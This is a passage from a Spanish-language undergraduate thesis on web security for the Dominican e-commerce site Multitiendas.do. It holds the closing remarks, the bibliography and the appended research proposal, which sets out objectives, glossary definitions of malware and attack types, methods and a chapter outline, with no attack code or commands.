su mayoría, aunque lamentablemente en la web la seguridad no se garantiza en su
totalidad. Si se tiene a mano un proyecto prometedor como es el caso de
Multitiendas.do es recomendable recurrir a las opiniones de profesionales en el área y
asegurar la inversión, realizando una auditoria de los sistemas de seguridad.
186
BIBLIOGRAFÍA
http://www.indotel.gob.do/noticias/noticias2005/indotel-elabora-anteproyecto-de-
ley-sobre-crimenes-y-delitos-de-alta-tecnologia.html
http://tecnologicodominicano.blogspot.com/2010/07/que-es-el-dicat.html
http://libroabiertorudyspillman.blogspot.com/2011/05/internet-caldo-de-cultivo-
del-crimen.html
http://www.enigmasoftware.com/top-20-countries-the-most-cybercrime/
http://www.amarjit.info/2011/05/top-10-countries-that-host-cyber-crime.html
http://es.wikipedia.org/wiki/Delito_inform%C3%A1tico
Javier Celaya, La empresa en la web 2.0, ISBN: 978-84-9875-008-9
Cyber Fraud: Tactics, Techniques and Procedures, 2009, Rick Howard, Auerbach Publications, ISBN: 1420091271
Reputación empresarial y ventaja competitiva, Gregorio Martín de castro, esic editorial, ISBN: 978-84-7356-850-6
http://es.wikipedia.org/wiki/Delito_inform%C3%A1tico
http://es.wikipedia.org/wiki/Seguridad_de_la_informaci%C3%B3n
Codigo Obsoleto https://www.owasp.org/index.php/Use_of_Obsolete_Methods
Web Semantica http://www.w3c.es/divulgacion/guiasbreves/websemantica
Componenetes http://es.wikipedia.org/wiki/Web_sem%C3%A1ntica
187
http://www.galeon.com/neoprogramadores/lselids.htm
Internet y Comercio Electronico, julian briz / isidro lazo, 2a edicion, ESIC
EDITORIAL, grupo mundi-prensa, deposito lega: m.36.971-2001
MODELO DE NEGOCIO http://luisguillermo.com/modelneg.pdf
Significado Boletines de Noticias o Newsletters
http://es.wikipedia.org/wiki/Boletín_informativo
Internet para el profesional tributario , Joan Hortala i Vallvé, Jesus ibañez peña.
pag 20. Julio 2001. Editora Cisspraxis S.A.
WEB 2.0. ANTONIO FUMERO Y GENIS ROCA. 2007. EDITORA OMAN
IMPRESORES
Lenguajes de programación: principios y practica por Kenneth C. Louden,
segunda edicion, Editora International Thomson Editores, S.A., mexico, D.F.
(2005)
Web 2.0: Google Docs, Romina Marcela Caivano y Liliana Noemi Villoria (2009).
editora Damian Truccone. Villa maria Argentina.
http://www.examiner.com/progressive-in-charlotte/paypal-attacked-by-wikileaks-
anonymous-hakers-after-amazon-strike-fails
The senior's guide to the Internet: surfing, shopping, e-mail and security
By Rebecca Sharp Colmer, Todd M. Thomas (pagina 174). editora Eklektika,
2005. USA. (chelsea, Missuri).
188
Cyber Fraud: Tactics, Techniques and Procedures, 2009, Rick Howard,
Auerbach Publications, ISBN: 1420091271
Reputación empresarial y ventaja competitiva, Gregorio Martín de castro, esic
editorial, ISBN: 978-84-7356-850-6
Javier Celaya, La empresa en la web 2.0, ISBN: 978-84-9875-008-9
Revista Muy Interesante, edición junio 2011, página 68, año XXVIII No.06.
Enigmasoftware, recuperado el 22 de Julio del 2010:
o http://www.enigmasoftware.com/top-20-countries-the-most-cybercrime/
Indotel, Proyecto de ley sobre crímenes y delitos de alta tecnología, recuperado
el 23 de julio del 2011 de:
o http://www.indotel.gob.do/noticias/noticias2005/indotel-elabora-
anteproyecto-de-ley-sobre-crimenes-y-delitos-de-alta-tecnologia.html
Robbins, Stephen. (2005). Administración. Pearson Educación. 9na edición.
México
http://es.wikipedia.org/wiki/Bolet%C3%ADn_informativo
http://es.wikipedia.org/wiki/Myspace
http://www.adobe.com/es/products/photoshop
http://www.adobe.com/es/products/fireworks.html
http://www.gimp.org/
http://www.adobe.com/es/products/flash.html
189
http://www.adobe.com/es/products/dreamweaver.html
http://www.mysql.com/why-mysql/
http://www.galeon.com/neoprogramadores/lselids.htm
Ley 126-02 Sobre Comercio Electrónico, Documentos y firma digital.
Simson L. Garfinkel (1995). "AOHell". The Boston Globe.
http://www.cbc.ca/news/business/story/2011/04/27/technology-playstation-data-
breach.html
http://es.wikipedia.org/wiki/Programaci%C3%B3n_segura
http://www.w3.org/Consortium/mission
http://www.w3c.org
Weeks, Jeffrey (2010, 9 de diciembre ) Paypal Payments Disrupted by WikiLeaks Attacks, Visa and Mastercard Also Attacked . Recuperado el 7 de julio del 2011 de:
o http://www.associatedcontent.com/article/6100832/paypal_payments_disrupted_by_wikileaks.html?cat=15
Wikipedia.org , ASSP, recuperado el 30 de julio de 2011 de
http://en.wikipedia.org/wiki/Anti-Spam_SMTP_Proxy
1 Man-In-The-Middle Attack, Owasp.org, recuperado el 31 de Julio del 2011, de https://www.owasp.org/index.php/Man-in-the-middle_attack ,
Wikipedia.org, Delito Informatico, recuperado el 17 de Julio del 2011 de http://es.wikipedia.org/wiki/Delito_inform%C3%A1tico
Wikipedia.org, Seguridad de la información, recuperado el 18 de julio del 2011 de http://es.wikipedia.org/wiki/Seguridad_de_la_informaci%C3%B3n
190
ANTEPROYECTO
1
UNIVERSIDAD APEC
UNAPEC
DECANATO DE INFORMATICA
“PROPUESTA DE SEGURIDAD: MITIGACIÓN DE RIESGOS Y POTENCIANDO OPORTUNIDADES”.
CASO: MULTITIENDAS.DO
Sustentado por:
Jonathan Fco. Abréu García 2001-2733
Ezequiel Sepúlveda 2002-1718
Asesor:
Deivis Adames
Anteproyecto de la Monografía para Optar por el Titulo en:
Ingeniería en Sistemas
Santo Domingo, D.N.
Junio 2011.
2
1. TEMA DE INVESTIGACIÓN
Propuesta de seguridad: mitigación de riesgos y potenciando oportunidades. Caso:
“MultiTiendas.do”
2. PLANTEAMIENTO DEL PROBLEMA DE INVESTIGACIÓN
Unas de las revolucionarias y crecientes formas de negocio en los últimos 7 años ha
sido la Web. Para notarlo no hay que ser adivino, solo hay que conocer el nivel de
ingresos de sitios web como Google, Plentyoffish, Yahoo, MSN, quienes facturan
millones de dólares en publicidad mensualmente. Pero el éxito de un portal no radica en
solo una idea revolucionaria como el caso de Twitter, sino en su estructura a nivel de
seguridad. Existen portales que se dedican al comercio electrónico, sitios como
ebay.com donde los usuarios se dedican a la compra, venta, marketing y suministro de
información complementaria para productos o servicios.
En la actualidad tanto las páginas webs como las aplicaciones web son diseñadas y
usadas en diferentes lenguajes; en las mayorías de los casos estas se desarrollan sin
tener en cuenta el concepto de seguridad. A menudo las páginas web son atacadas por
hackers y son víctimas de robo de información, fraudes cibernéticos, virus,
modificación del código fuente y en las mayorías de los casos permanecer fuera de
servicio. Existen unos 300 problemas que afectan la seguridad general de una
aplicación web66.
66 Seguridad en el comercio electrónico por Gabriel Rivas Pérez y Adrien Ricotta (2005).
3
La seguridad física también juega su parte en este rol. Esto implica pérdidas
significativas tanto en información como en dinero para ambos lados, el usuario y la
empresa. Luego de un ataque a una página web, los usuarios quedan con cierta
inseguridad para revelar sus datos.
Con la cantidad de ataques efectivos a servidores web y portales electrónicos es
necesario adoptar métodos, políticas y estándares que sirvan como herramientas de
seguridad a los desarrolladores web en el momento de la creación de estos sitios web.
De continuar dicha situación, los riesgos serán mayores y todo esto conllevaría desde
perder la reputación como empresa hasta enfrentarse a cargos legales.
Aunque es insuficiente programar de manera segura sólo una vez, es necesario
mantenerse actualizado con las mejores técnicas de programación, los métodos de
ataques que puedan comprometer la estabilidad del portal, revisiones de auditoría
periódicas, cursos de seguridad web y las vulnerabilidades halladas que se publican en
diferentes sitios web, revistas o libros.67
67Las 10 vulnerabilidades de seguridad más críticas en seguridad web, fundación OWASP, (2007).
4
3. OBJETIVOS DE LA INVESTIGACIÓN
El desarrollo de la presente investigación conlleva la formulación de los siguientes
objetivos:
3.1 Objetivo General
Optar por las mejores técnicas de seguridad y velar por el buen funcionamiento del sitio
web http://www.multitiendas.do, identificando las vulnerabilidades y mitigando los
riesgos.
3.2 Objetivo Específicos
● Investigar todo lo relacionado con el concepto “Seguridad Web”, tales como:
definición, antecedentes, importancia, procedimientos, vulnerabilidades, etc...
● Desarrollar conductas de seguridad al momento de crear portales.
● Desarrollar técnica para la prevención de delitos cibernéticos.
● Analizar los diferentes riesgos de la empresa objeto de este estudio
● Disminuir la propagación de Malwares a través de la web.
● Proteger al usuario, evitando que sus datos sean expuestos.
● Desarrollar técnicas para evaluar e identificar las vulnerabilidades de los sitios
web.
● Concientizar al usuario sobre métodos engañosos para robo de identidad.
● Mitigar las amenazas a los que son expuestos los portales electrónicos
● Aprovechar la web como medio de negocio.
5
4. JUSTIFICACIÓN DE LA INVESTIGACIÓN
El uso de la Web es inminente, es una tendencia y las empresas alrededor del mundo la
utilizan como medio ya sea informativo o como plataforma de negocios. Pero hay
muchos riesgos en su uso, la pérdida de información, la fácil propagación de virus y
spyware, hacen que cada día se adopten mayores medidas de seguridad. Pero a nivel
de desarrollo, la seguridad no depende solo de quien crea el sitio, sino también del
usuario.
El sitio web MultiTiendas.do por su naturaleza corre grandes riesgos de seguridad, ya
que es un blanco para los hackers, debido al manejo directo información monetaria y de
activos. Para mitigar las amenazas que existen debe conocerse a fondo los métodos y
herramientas utilizados por aquellos que atacan. Ahorrando dinero y brindando
confianza al internauta.
5. TIPO (S) DE LA INVESTIGACIÓN
Los tipos de investigación a ser utilizados son:
● Histórico: Ya que se harán menciones de diferentes casos ocurridos en
empresas, como la de objeto de estudio, relacionados con el tema analizado.
● Documental: Se recolectarán informaciones de fuentes escritas por autores de
fuentes como: Libros, Tesis, Monografías, Revistas, Artículos de Periódicos,
Internet, entre otras.
6
● Estudio de Caso: Pues se elaborará una Propuesta de Seguridad para una
empresa específica, llamada “WMSS (WEB MOBILE SOFTWARE SOLUTIONS) y su
producto http://www.MultiTiendas.do”
● Descriptiva: Debido a que se especificará cuales son las técnicas utilizadas para
mitigar los ataques a los portales electrónicos (multiTiendas.do).
6. MARCO DE REFERENCIA
6.1 Marco Teórico
"El ciber-crimen o fraude cibernético se ha incrementado exponencialmente en los
últimos 4 años, dando parte a una tendencia que no parece tener fin. Lo que comenzó
con 419 Scams y “phishing” rudimentario, ha crecido hacia una economía subterránea
altamente compleja, generando herramientas de software con calidad profesional,
negocios legítimos que proveen protección al criminal cibernético, escenarios de
manipulación sofisticada de inventario, y lo más tangible, un sentido de comunidad
entre los criminales. Las ganancias totales a nivel global por criminales de fraudes
cibernéticos es imposible estimar, pero los indicadores sugieren que ronda por las
decenas de billones de dólares, tal vez centenas.)68."
Basándonos en este articulo, hemos decidido desarrollar el tema de Seguridad Web,
desglosar las principales vulnerabilidades que presentan los sitios web en la actualidad
y como evitar los diferentes tipos de ataques. La mejor forma de hacerlo es detallando
68
Cyber Fraud: Tactics, Techniques, and procedures, (2009)
7
las principales técnicas utilizadas para comprometer los sitios web y sus informaciones.
Además de canalizar la mejor forma de proteger al usuario, quien es el principal
protagonista en la propagación de malware, debido a la ignorancia.
Y es esta ignorancia lo que ha llevado a los fraudes cibernéticos a ser tan exitosos,
utilizando técnicas como la ingeniería social para capturar información del usuario.
También existen muchas fallas de seguridad en los sitios web, principalmente aquellos
que son creados por pequeñas empresas que se dedican a su desarrollo, debido al
tiempo de entrega, lo que facilita la instrucción de usuarios malintencionados al servidor
y puede hacerse con el sitio.
Diariamente se desarrollan nuevas técnicas para atacar tanto al usuario como a los
sitios web, estar al tanto de los medios fundamentales para ello es imprescindible para
todo auditor de sistemas. Herramientas facilitadas en la distribución de Linux Backtrack
son esenciales para identificar las vulnerabilidades de los sitios web.
“No hay un problema simple en seguridad web. En la raíz del problema hay un poco de
esto y de aquello, cuando los sistemas web ya están haciendo demasiado al mismo
tiempo”69.
Para el auditor de sistemas de información, el tema de la seguridad web es importante.
Conocer los mejores mecanismos para detectar anomalías, vulnerabilidades y entender
que no solo se trata de códigos, sino que los problemas van más allá de lo que esta
simplemente a la vista, es primordial para desempeñarse como tal.
69Web Security, Amrit Tiwana, (1999)
8
Entre las principales razones por el cual la seguridad web es quebrantada con tanta
facilidad en la actualidad, se puede mencionar: La variedad de ataques, las brechas de
seguridad y la falta de apropiados controles de seguridad70.
6.2 Marco Conceptual
World Wide Web (WWW): Cuya traducción podría ser Red Global Mundial o "Red de
Amplitud Mundial", es un sistema de documentos de hipertexto y/o hipermedios
enlazados y accesibles a través de Internet. Con un navegador web, un usuario
visualiza sitios web compuestos de páginas web que pueden contener texto, imágenes,
videos u otros contenidos multimedia, y navega a través de ellas usando hiperenlaces71.
Sitio Web: Es un conjunto de páginas web, típicamente comunes a un dominio de
Internet o subdominio en la World Wide Web en Internet. Una página web es un
documento HTML/XHTML accesible generalmente mediante el protocolo HTTP de
Internet. Todos los sitios web públicamente accesibles constituyen una gigantesca
"World Wide Web" de información.
Página Web: También conocida como página de Internet, es un documento adaptado
para la Web y que normalmente forma parte de un sitio web. Su principal característica
son los hiperenlaces a otras páginas, siendo esto el fundamento de la Web.
Comercio electrónico: Se define como la transformación de procesos comerciales
claves mediante el uso de tecnología de Internet72.
70
OWASP The 10 most Critical Web Application Security Risks, (2010)
71 Wikipedia.org
72Comercio Electronico. Gary P. Schneider, (2004)
9
Malware: (del inglés malicious software), también llamado badware, software
malicioso o software malintencionado: es un tipo de software que tiene como
objetivo infiltrarse o dañar una computadora sin el consentimiento de su propietario. El
término malware es muy utilizado por profesionales de la informática para referirse a
una variedad de software hostil, intrusivo o molesto.
Virus informático: es un programa informático que es capaz de auto producir su
código en otros programas informáticos o computadoras de manera transparente al
usuario, capaz de transcurrido el tiempo de incubación / propagación, interferir con el
normal funcionamiento de una computadora o red de computadora73.
Programa espía (traducción del inglés spyware): es un programa, que funciona
dentro de la categoría malware, que se instala furtivamente en un ordenador para
recopilar información sobre las actividades realizadas en éste. La función más común
que tienen estos programas es la de recopilar información sobre el usuario y distribuirlo
a empresas publicitarias u otras organizaciones interesadas, pero también se han
empleado en organismos oficiales para recopilar información contra sospechosos de
delitos, como en el caso de la piratería de software
Adware: es cualquier programa que automáticamente se ejecuta, muestra o baja
publicidad web al computador después de instalar el programa o mientras se está
utilizando la aplicación. 'Ad' en la palabra 'Adware' se refiere a 'advertisement'
(anuncios) en inglés.
73Tras los pasos de un hacker, Néstor Marroquín (2010)
10
Cracker: Aquellas personas dedicadas a romper la seguridad puestas por los
desarrolladores de software, por lo general, en los archivos ejecutables74.
Stealer: (en español "ladrón de información") es el nombre genérico de programas
informáticos maliciosos del tipo troyano, que se introducen a través de internet en un
ordenador con el propósito de obtener de forma fraudulenta, información confidencial
del propietario, tal como su nombre de acceso a sitios web, contraseña o número de
tarjeta de crédito.
Troyano: es un programa dañino con apariencia de Software útil y absolutamente
normal, que puede resultar una importante amenaza contra la seguridad informática75.
Rootkit: es una herramienta o un grupo de ellas, que tiene como finalidad esconderse
a sí misma y esconder otros programas, procesos, archivos, directorios, claves de
registro, y puertos que permiten al intruso mantener el acceso a un sistema para
remotamente comandar acciones o extraer información sensible.
Backdoor o puerta trasera, es un programa cliente servidor que abre una puerta en el
equipo cliente a través de la cual el servidor toma posesión del equipo como si fuera
propio, lo que permite tener acceso a todos los recursos, programas, contraseñas y
correo electrónico76.
74Software Piracy Exposed, Paul Craig, (2005)
75Seguridad informática, Purificación Aguilera,(2010)
76Seguridad informática, Purificación Aguilera,(2010)
11
Ataque de denegación de servicio, también llamado ataque DoS (de las siglas en
inglés Denial of Service): ocurre cuando un sitio web recibe una sobrecargada cantidad
de solicitud de información, tales como solicitudes de inicio de sesiones77.
Botnet: es un término que hace referencia a un conjunto de robots informáticos o
bots, que se ejecutan de manera autónoma y automática.
Dialers: Se trata de un programa que marca un número de teléfono de tarificación
especial usando el módem, estos NTA son números cuyo coste es superior al de una
llamada nacional.
“.js”: Un archivo *.js, es un archivo de texto plano que contiene scripts de Javascript,
y que puede, por tanto, ser modificado con cualquier editor de textos. Es ejecutado
generalmente por un navegador web.
ActiveX: es un entorno para definir componentes de software reusables de forma
independiente del lenguaje de programación. Las aplicaciones de software pueden ser
diseñadas por uno o más de esos componentes para así proveer su correspondiente
funcionalidad.
Cookie: es un fragmento de información que se almacena en el disco duro del visitante
de una página web a través de su modo a petición del servidor de la página.
Phishing: es un término informático que denomina un tipo de delito encuadrado
dentro del ámbito de las estafas cibernéticas, y que se comete mediante el uso de un
77Management Information Systems, Lefy Oz, (2009)
12
tipo de ingeniería social caracterizado por intentar adquirir información confidencial de
forma fraudulenta (como puede ser una contraseña o información detallada sobre
tarjetas de crédito u otra información bancaria).
Pharming: Es la explotación de una vulnerabilidad en el software de los servidores
DNS (Domain Name System) o en el de los equipos de los propios usuarios, que
permite a un atacante redirigir un nombre de dominio (domain name) a otra máquina
distinta78.
Spoofing: Se refiere al uso de técnicas de suplantación de identidad generalmente con
usos maliciosos o de investigación.
Computer Hijacking: Se trata de utilizar cierto o todos los recursos de un
computador conectado a una red pública sin el consentimiento de su dueño. Dicho
apoderamiento se hace utilizando un pequeño programa llamado Bot79.
6.3 Marco Espacial
Esta propuesta de seguridad tiene como límite espacial la empresa WMSS (Web Mobile
Software Solutions) que brinda un servicio web dedicado a la venta de ropa y
accesorios llamada “MultiTiendas” en el sitio web www.MultiTiendas.do cuyo centro de
operaciones está ubicado en el Distrito Nacional de la ciudad de Santo Domingo, en la
Republica Dominicana.
78
Wikipedia.org
79Management Information Systems, Lefy Oz, (2009)
13
6.4 Marco Temporal
Este estudio contempla como referencia principal el periodo comprendido entre Enero-
Abril 2010. Ya que es el tiempo dado para desarrollar el mismo.
7. MÉTODOS, PROCEDIMIENTOS Y TÉCNICAS DE LA INVESTIGACIÓN
7.1 Métodos
Los métodos que se utilizarán para colectar las informaciones son:
● Observación: Se visualizará los diferentes procesos del sitio multitiendas.do y
su codificación.
● Síntesis: Debido que se que irán conociendo el origen de las fallas se seguridad
y sus consecuencias.
● Análisis: Ya que se identificaran las vulnerabilidades del sitio y propondrán los
controles para mitigarlas.
7.2 Fuente y Técnica para la recolección de la información
Utilizaremos fuentes primarias como libros, documentos y secundarias como
entrevistas.
14
8. TABLA DE CONTENIDO
AGRADECIMIENTOS.
DEDICATORIA.
INTRODUCCIÓN.
CAPÍTULO I: WEB MOBILE SOFTWARE SOLUTIONS “MULTITIENDAS.DO”
Objetivo: Conocer a fondo la naturaleza del negocio que es objeto de investigación.
1.1 - Perfil de la empresa.
1.2 - Misión.
1.3 - Visión.
1.4 - Valores.
1.5 Estructura Organizacional
1.6 - Modelo de Negocio.
1.7 - Servicios.
1.7.1 - Descripción de los Servicios.
1.8 - Proyección.
CAPÍTULO II: PÁGINAS WEB
Objetivo: Entender el origen de la Web. También, las herramientas para desarrollar las
mismas de forma adecuada.
2.1 - Origen.
2.2 - Web 2.0.
2.3 - El negocio de la Web.
2.4 - Tipos de páginas Web.
2.5 - Lenguajes de programación.
15
2.6 - Herramientas de Programación.
2.7 - Errores de implementación.
2.7.1 - Funcionamiento vs seguridad.
2.7.2 - Tiempo vs seguridad.
2.8 - Web Semántica.
CAPÍTULO III: COMERCIO ELECTRÓNICO
Objetivo: Proveer los requisitos legales para realizar transacciones en sitios web.
3.1 - Orígenes.
3.2 - Implementación.
3.3 - Ventajas de presencia en la Web.
3.3 - El Comercio electrónico en sitios web.
3.4 - Ley No.126-02 Sobre Comercio Electrónico, Documentos y firma digital.
3.4.1 - Norma sobre la protección de los derechos de los usuarios y
consumidores.
3.4.2 - Norma sobre la protección de datos personales.
3.4.3 - Norma sobre medios de pagos electrónicos.
3.5 - Métodos de Pago.
3.6 – Requisitos de afiliación a empresas procesadoras de pago
3.6.1 - Requisitos para la afiliación de comercio electrónico en VISANET para sitio
web.
3.6.2 - Requisitos para la afiliación de comercio electrónico en CARDNET para
sitio web.
3.6.3 - Solicitudes empresa procesadora de pagos en línea AvisorTech
16
CAPÍTULO IV: SEGURIDAD WEB
Objetivo: Conocer las amenazas de las páginas web y como mitigarlas.
4.1 - Antecedentes.
4.2 - Vulnerabilidades en portales electrónicos.
4.2.1 - Tipos de vulnerabilidades.
4.3 - Ataques Web.
4.3.1 - Agentes amenazadores.
4.3.2 - Tipos de ataques.
4.4 - Mitigación de riesgos
4.4.1 - Ejemplos y Prevención de ataques.
4.5 - Programación segura.
4.5.1 - Uso de códigos obsoletos.
4.5.1 - W3C.
CAPÍTULO V: SERVIDORES WEB
Objetivo: Entender cómo funciona la seguridad en los servidores y el impacto de los ataques a los mismos.
5.1 - Introducción
5.2 - Servicios de seguridad.
5.2.1 - Tipos de Servicios.
5.3 - Riesgos en los servidores.
5.4 - Ataques a servidores web.
5.4.1 - Tipos de ataques
5.5 - Controles.
5.6 - Impactos técnicos.
5.7 - Impactos organizacionales.
5.8 - Mitigando los riesgos.
17
CAPÍTULO VI: FRAUDES CIBERNÉTICOS
Objetivo: Proveer conocimiento sobre posibles fraudes que puede ser víctima un
negocio de comercio electrónico.
6.1 - Modelo económico.
6.2 - Tácticas.
6.3 - Técnicas.
6.4 - Procedimientos.
6.5 - Impactos al negocio.
6.6 - Reputación empresarial.
6.6.1 - Reputación Online.
6.6.2 - Aspectos negativos organizacionales.
6.7 – Negociación de información financiera.
6.7.1 - Comprando/Vendiendo información financiera.
Capítulo VII: Ciber-Crímenes
Objetivo: Proveer un enfoque detallado sobre los crímenes en la web y cómo
prevenirlos.
7.1 - Crímenes organizados.
7.2 - Técnicas y códigos maliciosos.
7.3 - Robo de propiedad intelectual.
7.4 - Publicación de data confidencial.
7.5 - Prevención de Ciber-Crímenes.
7.6 - Leyes reguladoras.
18
CAPÍTULO VIII: PROPUESTA SEGURIDAD
Objetivo: Ofrecer una solución a las fallas de seguridad que posee MultiTiendas.do
8.1 - Introducción.
8.2 - Matriz de Riesgo.
8.3 - Informe de Vulnerabilidades.
8.4 - Controles.
8.5 - Informe Final.
CONCLUSION.
RECOMENDACIONES.
REFERENCIAS BIBLIOGRÁFICAS.
ANEXOS.
19
9. DATOS BIBLIOGRAFICOS
9.1 Fuentes Primarias
Entrevistas al personal de la empresa Web Mobile Software Solutions, propietaria del
producto MultiTiendas.do.
9.2- Fuentes Secundarias
● Internet.
Wikipedia.org
Libros.
Tiwana, Amrit. (1999). Web Security.
Editorial Digital Press, Elsevier Science & Technology Books.
Schneider, Gary P. (2004). Comercio Electrónico.
Editorial Thomson. ISBN 970686329X.
Rivas Pérez, Gabriel, Ricotta, Adrien. (2005). Seguridad en el comercio electrónico.
Cengage Learning. Editorial Thomson International.
Craig, Paul. (2005). Software Piracy Exposed.
Editorial Syngress.
Fundación OWASP. (2007). Las 10 vulnerabilidades de seguridad más críticas en
seguridad web.
20
Disponible: https://www.owasp.org/images/a/ae/OWASP_Top_10_2007_Spanish.pdf
OWASP Foundation. (2010). OWASP The 10 most Critical Web Application Security
Risks.
Editorial OWASP Foundation. (2010 Edition).
Howard, Rick. (2009). Cyber Fraud: Tactics, Techniques, and procedures.
Editorial Auerbach Publications; 1 edition (April 23, 2009).
Oz, Effy. (2009). Management Information Systems.
Editorial Thomson Course Technology. (6th Edition). ISBN 1423901789.
Marroquín Carrera, Néstor. (2010). Tras los pasos de un hacker.
Seguridad informática, Purificación Aguilera,(2010)
Editorial CreateSpace.
